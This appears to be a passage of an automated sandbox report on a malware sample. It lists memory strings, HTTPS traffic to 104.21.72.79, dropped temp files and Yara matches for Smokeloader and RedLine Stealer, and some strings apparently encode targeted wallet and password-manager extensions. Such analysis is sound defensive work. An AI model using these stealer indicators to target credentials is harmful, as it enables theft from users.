Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/resource://gre/modules/Log.sys.mjsipc:first-content-process-
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000028.00000002.2882551286.000002618E65C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000028.00000002.2882551286.000002618E65C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/p
Source: firefox.exe, 00000028.00000002.2855910749.000000BCB2BBC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/findUpdates()
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000028.00000002.2927921411.0000026194B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.0000026184210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account--attempting-deelevationN
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account6
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 00000028.00000002.2878323682.0000026181BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842F2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2888379941.000002618F03A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 00000021.00000003.2708137723.000001E539280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2766541210.000001E53ADC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2751984387.000001E539282000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=alfon
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountj
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountt-
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountwebCOOP
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountwebIsolated=https://youtube.comwebIsolated=https://youtube.comfeature
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountx
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comZ
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comdocument-element-inserted
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comdocument-element-insertedwebIsolated=https://youtube.comdocument-element-inserted

Source: unknown	Network traffic detected: HTTP traffic on port 61247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown	Network traffic detected: HTTP traffic on port 61459 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown	Network traffic detected: HTTP traffic on port 61488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61348
Source: unknown	Network traffic detected: HTTP traffic on port 61391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61349
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61460
Source: unknown	Network traffic detected: HTTP traffic on port 61218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61463
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61223
Source: unknown	Network traffic detected: HTTP traffic on port 61271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55876
Source: unknown	Network traffic detected: HTTP traffic on port 61242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55993
Source: unknown	Network traffic detected: HTTP traffic on port 61416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55875
Source: unknown	Network traffic detected: HTTP traffic on port 61402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56210
Source: unknown	Network traffic detected: HTTP traffic on port 61236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61230
Source: unknown	Network traffic detected: HTTP traffic on port 55791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61199
Source: unknown	Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61357
Source: unknown	Network traffic detected: HTTP traffic on port 61249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61249
Source: unknown	Network traffic detected: HTTP traffic on port 61258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61524
Source: unknown	Network traffic detected: HTTP traffic on port 56346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61488
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61401
Source: unknown	Network traffic detected: HTTP traffic on port 61244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61259
Source: unknown	Network traffic detected: HTTP traffic on port 61343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61416
Source: unknown	Network traffic detected: HTTP traffic on port 61230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61391
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61392
Source: unknown	Network traffic detected: HTTP traffic on port 61432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55791
Source: unknown	Network traffic detected: HTTP traffic on port 61449 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55792
Source: unknown	Network traffic detected: HTTP traffic on port 55792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61283
Source: unknown	Network traffic detected: HTTP traffic on port 55993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61274
Source: unknown	Network traffic detected: HTTP traffic on port 61349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61430
Source: unknown	Network traffic detected: HTTP traffic on port 61257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61432
Source: unknown	Network traffic detected: HTTP traffic on port 61295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61463 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61293
Source: unknown	Network traffic detected: HTTP traffic on port 61325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61325
Source: unknown	Network traffic detected: HTTP traffic on port 61401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61448
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61449
Source: unknown	Network traffic detected: HTTP traffic on port 61212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61323
Source: unknown	Network traffic detected: HTTP traffic on port 61223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61337
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61459
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61295
Source: unknown	Network traffic detected: HTTP traffic on port 61217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61331
Source: unknown	Network traffic detected: HTTP traffic on port 61293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61212

Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp7452.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp73F3.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

PE file contains section with special chars

